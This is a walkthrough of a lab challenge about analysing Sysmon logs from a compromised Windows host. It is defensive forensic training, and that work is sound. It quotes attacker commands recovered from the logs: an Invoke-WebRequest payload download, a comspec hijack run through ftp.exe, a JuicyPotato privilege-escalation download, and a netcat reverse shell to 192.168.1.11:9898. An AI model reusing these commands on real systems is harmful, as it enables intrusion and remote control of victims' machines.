System Monitor (Sysmon) is a Windows system service and device driver that provides detailed monitoring of operating system activity, including process monitoring and network activity. This information can be beneficial in understanding various exploitation techniques.
A zipped file is provided to assist in solving the challenges.
Download the “Sysmon logs.zip” and enter the password “blto” to access the files.
- Text Editor
- Linux CLI
You are provided with Sysmon logs from a compromised endpoint. Analyze the logs to identify the steps and techniques used by the attacker.
Answer: updater.hta
- The first event with the associated IP shows that
chrome.exe
was used to download an HTA file namedupdater.hta
from the identified IP address.
Answer: Invoke-WebRequest
, Port: 6969
-
The log indicates that the attacker utilized the
Invoke-WebRequest
PowerShell cmdlet to download a file namedsupply.exe
from the IP192.168.1.11
using port6969
.- IP Address: 192.168.1.11
- Port No: 6969
- PowerShell Cmdlet: Invoke-WebRequest
Answer: comspec=c:\Windows\temp\supply.exe
- Explanation: The environment variable
comspec
points to what appears to be a malicious executable.
Answer: ftp.exe
- Explanation: “LOLbin” stands for “Living Off the Land Binary.” It refers to legitimate system binaries that can be exploited for malicious purposes. Where logs indicate a new event following the setting of the
comspec
variable:
- The command executed is
cmd \c set comspec=C:\windows\temp\supply.exe
, followed by the execution offtp.exe
, which utilizes the new environment variable.
Answer: ipconfig
- Explanation: The command
C:\\windows\\temp\\supply.exe /c "ipconfig"
is observed, indicating an initial network configuration check.
Answer: Python
Answer: https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
- Explanation: The command line for
supply.exe
indicates:
C:\windows\temp\supply.exe /c "powershell -c Invoke-WebRequest -Uri https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe -OutFile C:\Windows\Temp\juice.exe"
This command downloads JuicyPotato.exe
from the specified URL and saves it as juice.exe
in the Temp folder.
Answer: 9898
- Explanation: The attacker uses
juicy.exe
to establish a netcat shell back to their system with the command:
juicy.exe -l 9999 -p nc.exe -a "192.168.1.11 9898 -e cmd.exe"
In summary, the command sets up a connection to a remote system (192.168.1.11
at port 9898
) and executes cmd.exe
on that system using the nc.exe
payload.
Note: Always ensure that you have permission to analyze any logs or systems you encounter and that you are following ethical guidelines.